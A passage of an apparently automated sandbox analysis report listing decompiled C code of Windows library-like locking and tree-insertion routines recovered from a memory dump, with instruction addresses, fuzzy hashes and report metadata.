										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E1E3DE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E1E3E97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E1E3E006A(0x1e498608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1e498608);
												E1E3EB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1e496904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1e496e48; // 0x71d418
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E1E3BFFB0(_t198, _t240, 0x1e498608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E1E3E00C2(0x1e498608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x1e3d20a0
0x1e3d20a8
0x1e3d20ad
0x1e3d20b3
0x1e3d20b8
0x1e3d20c2
0x1e3d20c7
0x1e3d20cb
0x1e3d20d2
0x1e3d2263
0x1e3d2266
0x1e415836
0x1e415836
0x00000000
0x1e3d226c
0x1e3d226c
0x1e3d2270
0x1e3d2274
0x1e3d20e2
0x1e3d20e2
0x1e3d20e6
0x1e3d20ee
0x1e4157dc
0x1e4157de
0x1e4157ec
0x1e4157ec
0x1e4157f1
0x1e4157f3
0x1e4157f8
0x00000000
0x1e4157f8
0x1e4157e0
0x1e4157e4
0x1e4157ea
0x00000000
0x00000000
0x00000000
0x1e4157ea
0x1e3d20f4
0x1e3d20f4
0x1e3d20f8
0x1e3d20f8
0x1e3d20fc
0x1e3d2100
0x1e3d2106
0x1e3d2201
0x1e3d2206
0x1e3d220b
0x1e3d220e
0x1e3d22a9
0x1e3d22ac
0x00000000
0x00000000
0x1e3d22b2
0x1e3d22b5
0x1e415801
0x1e415806
0x00000000
0x00000000
0x1e415810
0x1e415815
0x1e415818
0x00000000
0x00000000
0x1e41581e
0x1e3d22bb
0x1e3d22bb
0x1e3d2218
0x1e3d2218
0x1e3d221c
0x1e3d2220
0x1e3d2222
0x1e3d22c2
0x1e3d22c4
0x1e3d22dc
0x1e3d22dc
0x1e3d22e1
0x00000000
0x00000000
0x00000000
0x1e3d22e7
0x1e3d22c8
0x1e3d22cd
0x1e3d22d3
0x1e3d22d6
0x1e415823
0x1e415825
0x1e415827
0x00000000
0x00000000
0x1e41582d
0x00000000
0x1e41582d
0x00000000
0x1e3d2228
0x1e3d2228
0x00000000
0x1e3d2228
0x1e3d2222
0x1e3d2214
0x1e3d2214
0x00000000
0x1e3d2114
0x1e3d2114
0x1e3d2114
0x1e3d211a
0x1e3d211c
0x1e3d2348
0x1e3d234d
0x1e415840
0x1e415845
0x1e415848
0x1e41584e
0x1e41584e
0x1e415848
0x1e3d2353
0x1e3d2355
0x1e3d2388
0x1e3d2388
0x1e3d2368
0x1e3d236a
0x1e3d236c
0x1e3d238f
0x00000000
0x1e3d236e
0x1e3d236e
0x1e3d218e
0x1e3d218e
0x1e3d2191
0x1e3d2195
0x1e415a03
0x1e415a06
0x1e415a0c
0x1e415a0f
0x1e415a11
0x1e415a13
0x1e415a13
0x1e415a19
0x1e415a1f
0x00000000
0x1e3d219b
0x1e3d219b
0x1e3d21a0
0x1e3d2282
0x1e3d2284
0x1e3d2284
0x1e3d2284
0x1e3d2284
0x1e3d21a6
0x1e3d21a9
0x1e3d21ac
0x1e3d21ae
0x1e3d21b3
0x1e3d228b
0x1e3d2290
0x1e3d2379
0x1e3d2296
0x1e3d2298
0x1e3d2298
0x1e3d2290
0x1e3d21b9
0x1e3d21be
0x1e3d22a2
0x1e3d22a2
0x1e3d21c4
0x1e3d21c8
0x1e3d21cc
0x1e3d21d0
0x1e3d21d4
0x1e3d21de
0x1e3d21e3
0x1e415a29
0x1e415a2c
0x00000000
0x00000000
0x1e415a3b
0x00000000
0x1e3d21e9
0x1e3d21e9
0x1e3d21e9
0x1e3d21ee
0x1e3d21f1
0x1e415a45
0x1e415a4b
0x1e415a52
0x1e415a58
0x1e415a5d
0x1e415a5f
0x1e415a71
0x1e415a61
0x1e415a6a
0x1e415a6a
0x1e415a76
0x1e415a79
0x1e415a7f
0x1e415a83
0x1e415a85
0x1e415a87
0x1e415a87
0x1e415a8c
0x1e415a91
0x1e415a97
0x1e415a9f
0x1e415aa0
0x1e415aa1
0x1e415aa6
0x1e415aab
0x1e415ab1
0x1e415ab3
0x1e415ab9
0x1e415aca
0x1e415ad4
0x1e415ad4
0x1e415ade
0x1e415ade
0x1e415aab
0x1e415a79
0x1e415a52
0x1e3d21f7
0x1e3d21f9
0x1e3d21fe
0x1e3d21fe
0x1e3d21e3
0x1e3d2195
0x1e3d236c
0x1e3d2122
0x1e3d2122
0x1e3d2124
0x1e3d2231
0x1e3d2236
0x1e3d2236
0x1e3d2238
0x1e3d2238
0x1e3d2240
0x1e3d2242
0x1e3d2244
0x1e4159fc
0x1e3d218c
0x1e3d218c
0x00000000
0x1e3d218c
0x1e3d224a
0x1e3d224f
0x1e3d2256
0x1e3d2304
0x1e3d2309
0x1e3d230f
0x1e3d231e
0x1e3d231e
0x1e3d231e
0x1e3d2320
0x1e3d2325
0x1e3d232a
0x1e3d232c
0x1e3d233e
0x1e3d233e
0x00000000
0x1e3d232c
0x1e3d2311
0x1e3d2317
0x1e3d231a
0x1e3d231c
0x1e3d2380
0x1e3d2380
0x1e3d2380
0x1e3d2384
0x00000000
0x00000000
0x1e3d2386
0x00000000
0x1e3d231c
0x1e3d225c
0x1e3d225c
0x00000000
0x1e3d225c
0x1e3d212a
0x1e3d2134
0x1e3d2138
0x1e3d213d
0x1e415858
0x1e415863
0x1e415863
0x1e415867
0x1e41586a
0x00000000
0x00000000
0x1e41586c
0x1e41586c
0x1e415871
0x1e415875
0x1e415877
0x1e415997
0x1e41599c
0x1e4159a1
0x1e4159a7
0x1e4159a7
0x00000000
0x1e4159a7
0x1e41587d
0x00000000
0x1e41588b
0x1e41588b
0x1e415890
0x1e415892
0x1e415894
0x1e415899
0x1e41589b
0x1e4158a0
0x1e4158a0
0x1e4158aa
0x1e4158b2
0x1e4158b6
0x1e4158be
0x1e4158c6
0x1e4158c9
0x1e41590d
0x1e415917
0x1e41591a
0x1e41591c
0x1e415920
0x1e415928
0x1e41592a
0x1e41592c
0x1e41592e
0x1e41592e
0x1e4158cb
0x1e4158cd
0x1e4158d8
0x1e4158e0
0x1e4158f4
0x1e4158fe
0x1e4158fe
0x1e41593a
0x1e41593e
0x1e415940
0x1e415942
0x00000000
0x1e415944
0x1e415944
0x1e415949
0x1e41594e
0x1e41594e
0x1e415953
0x1e41595b
0x1e415976
0x1e415976
0x1e41597a
0x1e41597f
0x00000000
0x00000000
0x00000000
0x00000000
0x1e415981
0x1e415981
0x1e415981
0x1e415983
0x1e415988
0x1e41598d
0x1e415991
0x1e415991
0x00000000
0x1e41595d
0x1e41595d
0x1e415963
0x1e415965
0x00000000
0x00000000
0x00000000
0x00000000
0x1e415967
0x1e415967
0x1e41596b
0x1e41596d
0x00000000
0x00000000
0x1e41596f
0x1e415971
0x1e415971
0x1e415974
0x00000000
0x00000000
0x00000000
0x1e415974
0x00000000
0x1e415967
0x1e41595b
0x1e415942
0x1e415863
0x1e3d2143
0x1e3d2143
0x1e3d2149
0x1e3d214f
0x1e3d22f1
0x1e3d22f6
0x00000000
0x1e3d2173
0x1e3d2173
0x1e3d217d
0x1e3d2181
0x1e3d2186
0x1e4159ae
0x1e4159b2
0x1e4159b5
0x1e4159b7
0x1e4159ba
0x1e4159cd
0x1e4159d1
0x1e4159d5
0x1e4159d9
0x1e4159db
0x00000000
0x00000000
0x1e4159dd
0x1e4159dd
0x1e4159e1
0x1e4159e4
0x1e4159e7
0x1e4159ee
0x1e4159ee
0x1e4159f3
0x1e4159f3
0x00000000
0x1e3d2186
0x1e3d214f
0x1e3d2106
0x1e3d2266
0x1e3d20d8
0x1e3d20da
0x1e3d20e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75855bb6545a8c1c3c6eac40a7732e60f339133ea872f77b1f11d8d088ffa8f0
Instruction ID: 0894c606dbcced6f3b54fe8b63461358fe533190c7cae0ce0de803255c4534f0
Opcode Fuzzy Hash: 75855bb6545a8c1c3c6eac40a7732e60f339133ea872f77b1f11d8d088ffa8f0
Instruction Fuzzy Hash: 0EF1F832A183819FD715CF29C44075AB7E6BF85764F488B1EF8959B340D738E849CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1E3BB090, Relevance: .4, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E1E3BB090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}

0x1e3bb095
0x1e3bb09b
0x1e3bb09f
0x1e3bb0a5
0x1e3bb0a7
0x1e3bb0aa
0x1e3bb0ad
0x1e3bb0b1
0x1e3bb3f8
0x1e3bb3fa
0x1e3bb3ff
0x1e3bb419
0x1e3bb41b
0x1e3bb41b
0x1e3bb401
0x00000000
0x1e3bb0b7
0x1e3bb0b9
0x1e3bb0bc
0x1e3bb0c0
0x1e3bb0c2
0x1e3bb0c2
0x1e3bb0c4
0x1e3bb0c8
0x1e3bb0cf
0x1e3bb0d1
0x1e3bb0d1
0x1e3bb0da
0x1e3bb0dd
0x1e3bb0df
0x1e3bb0df
0x1e3bb0e4
0x1e3bb0e9
0x1e3bb3e2
0x1e3bb3e5
0x1e3bb3eb
0x1e40a676
0x1e40a67b
0x1e40a67d
0x1e3bb3f1
0x1e3bb3f1
0x1e3bb3f1
0x1e3bb0ef
0x1e3bb0ef
0x1e3bb0ef
0x1e3bb0e9
0x1e3bb0f6
0x1e3bb28d
0x1e3bb28e
0x1e3bb293
0x1e3bb0fc
0x1e3bb0fc
0x1e3bb101
0x1e3bb104
0x1e3bb107
0x1e3bb10c
0x1e40a687
0x1e40a68d
0x1e40a68d
0x1e40a687
0x1e3bb112
0x1e3bb116
0x1e40a696
0x1e40a69c
0x1e40a69c
0x1e40a696
0x1e3bb120
0x1e3bb121
0x1e3bb124
0x1e3bb127
0x1e3bb12a
0x1e3bb12d
0x1e3bb132
0x1e40a6a5
0x00000000
0x00000000
0x1e40a6ab
0x00000000
0x1e3bb138
0x1e3bb138
0x1e3bb13a
0x1e3bb193
0x1e3bb197
0x1e3bb19d
0x1e3bb29c
0x1e3bb29f
0x1e3bb2a2
0x1e3bb2a7
0x1e40a6d2
0x1e40a6d8
0x1e40a6d8
0x1e40a6d2
0x1e3bb2af
0x1e3bb420
0x1e3bb422
0x1e3bb423
0x00000000
0x1e3bb2b5
0x1e3bb2b5
0x1e3bb2ba
0x1e40a6e1
0x1e40a6e7
0x1e40a6e7
0x1e40a6e1
0x1e3bb2c2
0x00000000
0x1e3bb2c8
0x1e3bb2cb
0x1e3bb2d0
0x1e40a6f0
0x1e40a6f6
0x1e40a6f6
0x1e40a6f0
0x1e3bb2d8
0x00000000
0x1e3bb2de
0x1e3bb2de
0x1e3bb2de
0x1e3bb2e1
0x1e3bb2e6
0x1e3bb2eb
0x1e40a6ff
0x1e40a705
0x1e40a705
0x1e40a6ff
0x1e3bb2f3
0x00000000
0x1e3bb2f9
0x1e3bb2fb
0x1e3bb2fd
0x1e3bb301
0x1e3bb303
0x1e3bb303
0x1e3bb308
0x1e3bb30b
0x1e3bb310
0x1e3bb312
0x1e3bb312
0x1e3bb31c
0x1e3bb322
0x1e3bb327
0x1e40a70e
0x1e3bb335
0x1e3bb337
0x1e40a71d
0x1e40a723
0x1e40a723
0x1e40a71d
0x1e3bb340
0x1e3bb345
0x1e3bb349
0x1e40a72a
0x1e40a72a
0x1e3bb352
0x1e3bb357
0x1e3bb359
0x1e3bb359
0x1e3bb365
0x1e3bb367
0x1e3bb36c
0x00000000
0x1e3bb36c
0x1e40a714
0x1e40a714
0x1e3bb32f
0x1e3bb3b8
0x1e3bb3bd
0x1e3bb3c4
0x1e3bb425
0x1e3bb427
0x1e3bb429
0x1e3bb429
0x1e3bb427
0x1e3bb3c8
0x00000000
0x00000000
0x1e3bb3ce
0x1e3bb42f
0x1e3bb3d0
0x1e3bb3d0
0x1e3bb3d0
0x1e3bb3d7
0x1e3bb3da
0x1e3bb3da
0x00000000
0x1e3bb32f
0x1e3bb2f3
0x1e3bb2d8
0x1e3bb2c2
0x1e3bb2af
0x1e3bb1a3
0x1e3bb1a9
0x1e3bb1af
0x1e3bb1b2
0x1e3bb1b5
0x1e3bb1b8
0x1e40a733
0x1e40a739
0x1e40a739
0x1e40a733
0x1e3bb1c0
0x00000000
0x1e3bb1c6
0x1e3bb1c8
0x1e3bb1cb
0x1e3bb1ce
0x1e3bb1d3
0x1e40a742
0x1e40a748
0x1e40a748
0x1e40a742
0x1e3bb1db
0x00000000
0x1e3bb1e1
0x1e3bb1e1
0x1e3bb1e6
0x1e3bb1e9
0x1e3bb1ee
0x1e40a751
0x1e3bb409
0x1e3bb409
0x1e3bb40e
0x00000000
0x00000000
0x1e3bb410
0x1e3bb22d
0x1e3bb22f
0x1e40a790
0x1e40a796
0x1e40a796
0x1e40a790
0x1e3bb23d
0x1e3bb243
0x1e3bb248
0x1e40a79f
0x00000000
0x00000000
0x1e40a7a5
0x00000000
0x1e3bb24e
0x1e3bb24e
0x1e3bb250
0x1e3bb374
0x1e3bb379
0x1e3bb37e
0x1e40a7ae
0x1e40a7b4
0x1e40a7b4
0x1e40a7ae
0x1e3bb386
0x00000000
0x1e3bb38c
0x1e3bb38e
0x1e40a7bd
0x1e3bb394
0x1e3bb394
0x1e3bb394
0x1e3bb39b
0x1e3bb39e
0x00000000
0x1e3bb39e
0x1e3bb386
0x1e3bb256
0x1e3bb258
0x1e40a7c6
0x1e40a7cc
0x1e40a7cc
0x1e40a7c6
0x1e3bb261
0x1e3bb266
0x1e3bb26a
0x1e40a7d3
0x1e40a7d3
0x1e3bb273
0x1e3bb278
0x1e3bb27a
0x1e3bb27a
0x1e3bb281
0x1e3bb283
0x1e3bb285
0x1e3bb287
0x1e3bb289
0x00000000
0x1e3bb289
0x1e3bb248
0x1e40a757
0x1e40a757
0x1e3bb1f6
0x00000000
0x00000000
0x1e3bb1fc
0x1e3bb201
0x1e40a760
0x1e40a766
0x1e40a766
0x1e40a760
0x1e3bb209
0x1e3bb3a8
0x1e40a76f
0x1e3bb3ae
0x1e3bb3ae
0x1e3bb3ae
0x1e3bb3b0
0x00000000
0x1e3bb20f
0x1e3bb20f
0x1e3bb213
0x1e40a778
0x1e40a77e
0x1e40a77e
0x1e40a778
0x1e3bb21b
0x00000000
0x1e3bb221
0x1e3bb223
0x1e40a787
0x1e3bb229
0x1e3bb229
0x1e3bb229
0x1e3bb22b
0x00000000
0x1e3bb22b
0x1e3bb21b
0x1e3bb209
0x1e3bb1db
0x1e3bb142
0x1e3bb142
0x1e3bb146
0x1e3bb148
0x1e3bb14c
0x1e3bb14f
0x1e3bb154
0x1e3bb15b
0x1e40a6b4
0x00000000
0x00000000
0x1e40a6ba
0x1e40a6ba
0x1e3bb163
0x00000000
0x00000000
0x00000000
0x1e3bb163
0x1e3bb13a
0x1e3bb169
0x1e3bb16b
0x1e3bb16e
0x1e3bb171
0x1e3bb175
0x1e3bb178
0x1e40a6c3
0x1e40a6c9
0x1e40a6c9
0x1e40a6c3
0x1e3bb180
0x1e3bb184
0x00000000
0x1e3bb104
0x1e3bb0f6

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction ID: 3d3406fa12316aec2a88ec7b17b061fa57fdf5567aa246c6c0c3ffefdab9945a
Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction Fuzzy Hash: 1FD1F231B202468BC729CE2AC49025AB7A6AF85354F298779DC9BCFB49EF31D8419750

Uniqueness

Uniqueness Score: -1.00%

Function 1E3A0D20, Relevance: .4, Instructions: 372
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E1E3A0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
